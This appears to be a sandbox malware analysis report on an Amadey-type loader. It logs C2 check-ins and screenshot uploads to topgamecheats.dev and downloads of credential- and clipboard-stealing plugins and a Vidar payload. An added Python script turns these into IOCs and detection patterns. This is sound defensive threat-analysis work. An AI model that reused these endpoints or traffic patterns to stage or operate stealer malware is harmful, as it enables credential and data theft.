Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: topgamecheats.dev | Content-Length: 154 | Cache-Control: no-cache | Data Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 42 46 46 37 30 42 46 38 33 38 44 32 46 41 45 32 45 45 43 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 32 33 33 37 31 34 42 35 35 36 44 33 36 35 46 46 46 39 36 32 41 39 45 33 43 36 44 45 44 39 33 31 31 36 41 35 33 34 46 46 44 30 31 32 38 33 46 44 35 32 35 38 34 39 46 45 33 30 38 | Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8ABFF70BF838D2FAE2EECA3A5728455AF2739D7C43867BB42874233714B556D365FFF962A9E3C6DED93116A534FFD01283FD525849FE308
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php?scr=1 HTTP/1.1 | Content-Type: multipart/form-data; boundary=----ODU0MTE= | Host: topgamecheats.dev | Content-Length: 85563 | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /vidar.exe HTTP/1.1 | Host: topgamecheats.dev
Source: global traffic HTTP traffic detected: GET /j4Fvskd3/Plugins/clip64.dll HTTP/1.1 | Host: topgamecheats.dev
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php?scr=1 HTTP/1.1 | Content-Type: multipart/form-data; boundary=----ODU0MTE= | Host: topgamecheats.dev | Content-Length: 85563 | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: topgamecheats.dev | Content-Length: 31 | Cache-Control: no-cache | Data Raw: 65 31 3d 31 30 30 30 31 30 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 | Data Ascii: e1=1000101001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /build.dll HTTP/1.1 | Host: topgamecheats.dev
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php?scr=1 HTTP/1.1 | Content-Type: multipart/form-data; boundary=----ODU0MTE= | Host: topgamecheats.dev | Content-Length: 85563 | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php?scr=1 HTTP/1.1 | Content-Type: multipart/form-data; boundary=----ODU0MTE= | Host: topgamecheats.dev | Content-Length: 85563 | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php?scr=1 HTTP/1.1 | Content-Type: multipart/form-data; boundary=----ODU0MTE= | Host: topgamecheats.dev | Content-Length: 85563 | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php?scr=1 HTTP/1.1 | Content-Type: multipart/form-data; boundary=----ODU0MTE= | Host: topgamecheats.dev | Content-Length: 85563 | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php?scr=1 HTTP/1.1 | Content-Type: multipart/form-data; boundary=----ODU0MTE= | Host: topgamecheats.dev | Content-Length: 85563 | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: topgamecheats.dev | Content-Length: 31 | Cache-Control: no-cache | Data Raw: 64 31 3d 31 30 30 30 31 30 32 30 31 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 | Data Ascii: d1=1000102011&unit=246122658369
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php?scr=1 HTTP/1.1 | Content-Type: multipart/form-data; boundary=----ODU0MTE= | Host: topgamecheats.dev | Content-Length: 85563 | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /vidar.exe HTTP/1.1 | Host: topgamecheats.dev | Range: bytes=16384- | If-Range: "661f4296-4b200"
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php?scr=1 HTTP/1.1 | Content-Type: multipart/form-data; boundary=----ODU3NDc= | Host: topgamecheats.dev | Content-Length: 85899 | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php?scr=1 HTTP/1.1 | Content-Type: multipart/form-data; boundary=----MTEwNDA3 | Host: topgamecheats.dev | Content-Length: 110559 | Cache-Control: no-cache
Source: Joe Sandbox View IP Address: 93.123.39.96
Source: Joe Sandbox View ASN Name: NET1-ASBG
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_00414770 InternetCloseHandle,InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle, 0_2_00414770
Source: global traffic HTTP traffic detected: GET /j4Fvskd3/Plugins/cred64.dll HTTP/1.1 | Host: topgamecheats.dev
Source: global traffic HTTP traffic detected: GET /vidar.exe HTTP/1.1 | Host: topgamecheats.dev
Source: global traffic HTTP traffic detected: GET /j4Fvskd3/Plugins/clip64.dll HTTP/1.1 | Host: topgamecheats.dev
Source: global traffic HTTP traffic detected: GET /build.dll HTTP/1.1 | Host: topgamecheats.dev
Source: global traffic HTTP traffic detected: GET /vidar.exe HTTP/1.1 | Host: topgamecheats.dev | Range: bytes=16384- | If-Range: "661f4296-4b200"
Source: unknown DNS traffic detected: queries for: topgamecheats.dev
Source: unknown HTTP traffic detected: POST /j4Fvskd3/index.php?scr=1 HTTP/1.1 | Content-Type: multipart/form-data; boundary=----ODU0MTE= | Host: topgamecheats.dev | Content-Length: 85563 | Cache-Control: no-cache
Source: Dctooux.exe, 0000001C.00000003.2425177632.0000000002FA6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/$
Source: Dctooux.exe, 0000001C.00000002.2929110150.0000000002FA9000.00000004.00000020.00020000.00000000.sdmp, Dctooux.exe, 0000001C.00000002.2931017572.00000000069E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/build.dll
Source: Dctooux.exe, 0000001C.00000002.2929110150.0000000002FA9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/build.dll#
Source: Dctooux.exe, 0000001C.00000002.2931017572.00000000069E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/build.dllN
Source: Dctooux.exe, 0000001C.00000002.2931017572.00000000069E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/build.dllp
Source: Dctooux.exe, 0000001C.00000002.2929110150.0000000002FC3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/j4Fvskd3/Plugins/clip64.dll
Source: Dctooux.exe, 0000001C.00000002.2929110150.0000000002FC3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/j4Fvskd3/Plugins/clip64.dllo
Source: Dctooux.exe, 0000001C.00000003.2425177632.0000000002FC3000.00000004.00000020.00020000.00000000.sdmp, Dctooux.exe, 0000001C.00000002.2929110150.0000000002F5B000.00000004.00000020.00020000.00000000.sdmp, Dctooux.exe, 0000001C.00000003.2425177632.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp, Dctooux.exe, 0000001C.00000003.2425177632.0000000002FA6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/j4Fvskd3/Plugins/cred64.dll
Source: Dctooux.exe, 0000001C.00000003.2425177632.0000000002FA6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/j4Fvskd3/Plugins/cred64.dll0-t
Source: Dctooux.exe, 0000001C.00000002.2929110150.0000000002FC3000.00000004.00000020.00020000.00000000.sdmp, Dctooux.exe, 0000001C.00000003.2425177632.0000000002FC3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/j4Fvskd3/Plugins/cred64.dll=
Source: Dctooux.exe, 0000001C.00000002.2929110150.0000000002FC3000.00000004.00000020.00020000.00000000.sdmp, Dctooux.exe, 0000001C.00000003.2425177632.0000000002FC3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/j4Fvskd3/Plugins/cred64.dllB
Source: Dctooux.exe, 0000001C.00000003.2425177632.0000000002FC3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/j4Fvskd3/Plugins/cred64.dllR
Source: Dctooux.exe, 0000001C.00000003.2425177632.0000000002FC3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/j4Fvskd3/Plugins/cred64.dllp
Source: Dctooux.exe, 0000001C.00000002.2929110150.0000000002F5B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/j4Fvskd3/Plugins/cred64.dlly
Source: Dctooux.exe, 0000001C.00000003.2425177632.0000000002FA6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/j4Fvskd3/index.php
Source: Dctooux.exe, 0000001C.00000003.2425177632.0000000002FA6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/j4Fvskd3/index.php:
Source: Dctooux.exe, 0000001C.00000002.2929110150.0000000002FA1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/j4Fvskd3/index.php?scr=1
Source: Dctooux.exe, 0000001C.00000002.2929110150.0000000002FA1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/j4Fvskd3/index.php?scr=1.AppDataBG9
Source: Dctooux.exe, 0000001C.00000002.2929110150.0000000002F8D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/j4Fvskd3/index.php?scr=1FDA
Source: Dctooux.exe, 0000001C.00000002.2929110150.0000000002F8D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/j4Fvskd3/index.php?scr=1FEA
Source: Dctooux.exe, 0000001C.00000002.2929110150.0000000002FA9000.00000004.00000020.00020000.00000000.sdmp, Dctooux.exe, 0000001C.00000003.2425177632.0000000002FA6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/j4Fvskd3/index.php?scr=1N
Source: Dctooux.exe, 0000001C.00000002.2929110150.0000000002FA1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/j4Fvskd3/index.php?scr=1g
Source: Dctooux.exe, 0000001C.00000002.2931017572.00000000069E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/j4Fvskd3/index.php?scr=1x
Source: Dctooux.exe, 0000001C.00000003.2425177632.0000000002FA6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/j4Fvskd3/index.phpL-
Source: Dctooux.exe, 0000001C.00000002.2929110150.0000000002FA9000.00000004.00000020.00020000.00000000.sdmp, Dctooux.exe, 0000001C.00000003.2425177632.0000000002FA6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/j4Fvskd3/index.phpx-
Source: Dctooux.exe, 0000001C.00000002.2931017572.00000000069E0000.00000004.00000020.00020000.00000000.sdmp, Dctooux.exe, 0000001C.00000002.2929110150.0000000002FE4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/vidar.exe
Source: Dctooux.exe, 0000001C.00000002.2929110150.0000000002FA9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/vidar.exe814606e0c54
Source: Dctooux.exe, 0000001C.00000002.2929110150.0000000002FA9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/vidar.exe814606e0c540
Source: Dctooux.exe, 0000001C.00000002.2929110150.0000000002FA9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/vidar.exe814606eodedx
Source: Dctooux.exe, 0000001C.00000002.2929110150.0000000002FE4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/vidar.exeM
Source: Amcache.hve.3.dr String found in binary or memory: http://upx.sf.net
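The memory strings above repeat the Amadey C2 host, the campaign directory (j4Fvskd3), the plugin paths and the payload URLs, each several times with trailing junk bytes from the dump (".dll0-t", "?scr=1FDA"). The following Python is an added example and not part of the Joe Sandbox report: it canonicalises such strings into a clean IOC set, generalises the observed URL shapes (/<token>/index.php, /<token>/index.php?scr=1, /<token>/Plugins/cred64.dll or clip64.dll, root-level .exe/.dll downloads) into patterns that also fire on a host that is not in the report, and runs them over constructed proxy log lines. The log format, the 6-12 character token bound, and the category name c2_screenshot (the common reading of Amadey's scr=1 query as a screenshot upload) are assumptions made for this example; the report itself only shows the strings.

```python
"""Turn the Amadey URL strings from the report into IOCs and hunt for the same
URL shapes in proxy logs. Added example; all log lines below are constructed."""
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Host copied from the report's memory strings.
AMADEY_C2_HOST = "topgamecheats.dev"

# Memory-dump strings carry trailing junk bytes. Cut each URL at the first
# plausible terminal; "scr=<digits>" is specific to the index.php query seen
# in the report (assumption: no other query parameters are handled).
URL_RE = re.compile(r"https?://[\w.-]+/[\w./-]*?(?:\.dll|\.exe|\.php(?:\?scr=\d+)?)")

# Path shapes generalised from the strings. The 6-12 alphanumeric campaign
# token is an assumption drawn from "j4Fvskd3"; the report does not state it.
TOKEN = r"/[A-Za-z0-9]{6,12}"
CHECKIN_RE = re.compile(rf"^{TOKEN}/index\.php$")
PLUGIN_RE = re.compile(rf"^{TOKEN}/Plugins/(cred64|clip64)\.dll$")
PAYLOAD_RE = re.compile(r"^/[\w-]+\.(exe|dll)$")


def extract_report_urls(report_lines):
    """Canonical URL set from 'String found in binary or memory: ...' lines."""
    found = set()
    for line in report_lines:
        m = URL_RE.search(line)
        if m:
            found.add(m.group(0))
    return found


def classify(url):
    """Map one request URL to an Amadey traffic category, or None."""
    u = urlsplit(url)
    if CHECKIN_RE.match(u.path):
        return "c2_screenshot" if u.query == "scr=1" else "c2_checkin"
    if PLUGIN_RE.match(u.path):
        return "plugin_fetch"
    if PAYLOAD_RE.match(u.path):
        return "payload_fetch"
    return None


# Constructed log format: "<iso-time> <client-ip> <method> <url> <status>"
LOG_RE = re.compile(r"^(?P<ts>\S+) (?P<src>\S+) (?P<method>[A-Z]+) (?P<url>\S+) (?P<status>\d{3})$")


def scan_log(lines):
    """Group Amadey-looking requests per client and give each client a verdict."""
    per_src = defaultdict(lambda: {"categories": set(), "known_host": False})
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        cat = classify(m["url"])
        if cat is None:
            continue
        entry = per_src[m["src"]]
        entry["categories"].add(cat)
        if urlsplit(m["url"]).hostname == AMADEY_C2_HOST:
            entry["known_host"] = True
    result = {}
    for src, e in per_src.items():
        if e["known_host"]:
            verdict = "known_amadey_c2"          # exact IOC from the report
        elif e["categories"] & {"c2_checkin", "c2_screenshot", "plugin_fetch"}:
            verdict = "amadey_like_pattern"      # same URL shape, different host
        else:
            verdict = "generic_binary_download"  # root-level .exe/.dll only
        result[src] = {"verdict": verdict, "categories": sorted(e["categories"])}
    return result


# A subset of the report's strings, copied verbatim including junk suffixes.
REPORT_LINES = [
    "String found in binary or memory: http://topgamecheats.dev/build.dll#",
    "String found in binary or memory: http://topgamecheats.dev/build.dllN",
    "String found in binary or memory: http://topgamecheats.dev/j4Fvskd3/Plugins/clip64.dllo",
    "String found in binary or memory: http://topgamecheats.dev/j4Fvskd3/Plugins/cred64.dll0-t",
    "String found in binary or memory: http://topgamecheats.dev/j4Fvskd3/index.phpL-",
    "String found in binary or memory: http://topgamecheats.dev/j4Fvskd3/index.php?scr=1.AppDataBG9",
    "String found in binary or memory: http://topgamecheats.dev/j4Fvskd3/index.php?scr=1FDA",
    "String found in binary or memory: http://topgamecheats.dev/vidar.exe814606e0c54",
    "String found in binary or memory: http://upx.sf.net",
]

# Constructed proxy log: one infected client, one benign client, one client
# talking to an unknown host with the same URL layout.
PROXY_LOG = [
    "2024-04-12T10:01:03Z 10.0.0.15 POST http://topgamecheats.dev/j4Fvskd3/index.php 200",
    "2024-04-12T10:01:05Z 10.0.0.15 GET http://topgamecheats.dev/j4Fvskd3/Plugins/cred64.dll 200",
    "2024-04-12T10:01:07Z 10.0.0.15 GET http://topgamecheats.dev/j4Fvskd3/Plugins/clip64.dll 200",
    "2024-04-12T10:01:09Z 10.0.0.15 GET http://topgamecheats.dev/vidar.exe 200",
    "2024-04-12T10:02:00Z 10.0.0.15 POST http://topgamecheats.dev/j4Fvskd3/index.php?scr=1 200",
    "2024-04-12T10:03:00Z 10.0.0.22 GET http://example.com/index.php 200",
    "2024-04-12T10:04:00Z 10.0.0.31 POST http://203.0.113.7/Ab9xQ2kz/index.php 200",
    "2024-04-12T10:04:02Z 10.0.0.31 GET http://203.0.113.7/Ab9xQ2kz/Plugins/cred64.dll 404",
]

if __name__ == "__main__":
    for url in sorted(extract_report_urls(REPORT_LINES)):
        print(url, "->", classify(url))
    for src, verdict in scan_log(PROXY_LOG).items():
        print(src, verdict)
```

The Amcache string http://upx.sf.net is dropped on purpose: it is a UPX artifact, not a C2 indicator, and it has no path component that the URL regex accepts.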

System Summary

Source: 0000001C.00000002.2929040316.0000000002F04000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.1842923328.0000000002F13000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000014.00000002.1847927204.0000000002E42000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000014.00000002.1848088766.0000000004930000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000001C.00000002.2929453849.0000000003100000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.1843161831.00000000048E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_0041FE97 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers, 0_2_0041FE97
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_0041FE97 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers, 20_2_0041FE97
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_0041FE97 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers, 28_2_0041FE97
Source: C:\Users\user\Desktop\C4v61Eu50U.exe File created: C:\Windows\Tasks\Dctooux.job
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_00409DA0 0_2_00409DA0
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_004270F1 0_2_004270F1
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_0043B153 0_2_0043B153
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_00424113 0_2_00424113
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_0044A2D9 0_2_0044A2D9
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_00446438 0_2_00446438
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_00429492 0_2_00429492
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_00424902 0_2_00424902
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_0044AA2B 0_2_0044AA2B
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_0044AB4B 0_2_0044AB4B
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_0044BE90 0_2_0044BE90
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_00404FE0 0_2_00404FE0
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_00445FA0 0_2_00445FA0
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_0492A540 0_2_0492A540
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_049096F9 0_2_049096F9
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_0492C0F7 0_2_0492C0F7
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_048EA007 0_2_048EA007
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_04926207 0_2_04926207
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_048E5247 0_2_048E5247
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_0491B3BA 0_2_0491B3BA
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_04907358 0_2_04907358
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_0490437A 0_2_0490437A
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_0492AC92 0_2_0492AC92
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_0492ADB2 0_2_0492ADB2
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_04904B69 0_2_04904B69
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_00409DA0 20_2_00409DA0
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_004270F1 20_2_004270F1
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_0043B153 20_2_0043B153
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_00424113 20_2_00424113
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_0044A2D9 20_2_0044A2D9
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_00446438 20_2_00446438
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_00429492 20_2_00429492
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_00424902 20_2_00424902
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_0044AA2B 20_2_0044AA2B
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_0044AB4B 20_2_0044AB4B
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_0044BE90 20_2_0044BE90
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_00404FE0 20_2_00404FE0
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_00445FA0 20_2_00445FA0
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_0497A540 20_2_0497A540
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_049596F9 20_2_049596F9
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_0497C0F7 20_2_0497C0F7
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_0493A007 20_2_0493A007
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_04976207 20_2_04976207
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_04935247 20_2_04935247
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_0496B3BA 20_2_0496B3BA
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_04957358 20_2_04957358
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_0495437A 20_2_0495437A
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_0497AC92 20_2_0497AC92
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_0497ADB2 20_2_0497ADB2
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_04954B69 20_2_04954B69
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_0040F410 28_2_0040F410
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_00424113 28_2_00424113
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_00446438 28_2_00446438
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_00424902 28_2_00424902
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_0044AA2B 28_2_0044AA2B
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_0044AB4B 28_2_0044AB4B
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_00404FE0 28_2_00404FE0
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_004270F1 28_2_004270F1
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_0043B153 28_2_0043B153
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_00429492 28_2_00429492
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_0044BE90 28_2_0044BE90
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_03127358 28_2_03127358
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_0312437A 28_2_0312437A
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_0313B3BA 28_2_0313B3BA
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_03146207 28_2_03146207
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_03105247 28_2_03105247
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_0310A007 28_2_0310A007
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_0314C0F7 28_2_0314C0F7
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_031296F9 28_2_031296F9
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_0314A540 28_2_0314A540
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_03124B69 28_2_03124B69
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_0314ADB2 28_2_0314ADB2
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_0314AC92 28_2_0314AC92
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: String function: 048FB627 appears 127 times
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: String function: 049014F7 appears 38 times
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: String function: 00421290 appears 41 times
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: String function: 0041B3C0 appears 123 times
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: String function: 04900EB9 appears 64 times
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: String function: 00420C52 appears 66 times
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: String function: 04950EB9 appears 64 times
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: String function: 00421290 appears 85 times
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: String function: 0041B3C0 appears 245 times
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: String function: 03120EB9 appears 64 times
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: String function: 00420968 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: String function: 00420953 appears 60 times
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: String function: 0043C0A3 appears 43 times
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: String function: 0041ABA0 appears 43 times
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: String function: 0494B627 appears 127 times
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: String function: 049514F7 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: String function: 00420C52 appears 146 times
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: String function: 03120BBA appears 48 times
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: String function: 0311B627 appears 127 times
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: String function: 031214F7 appears 38 times
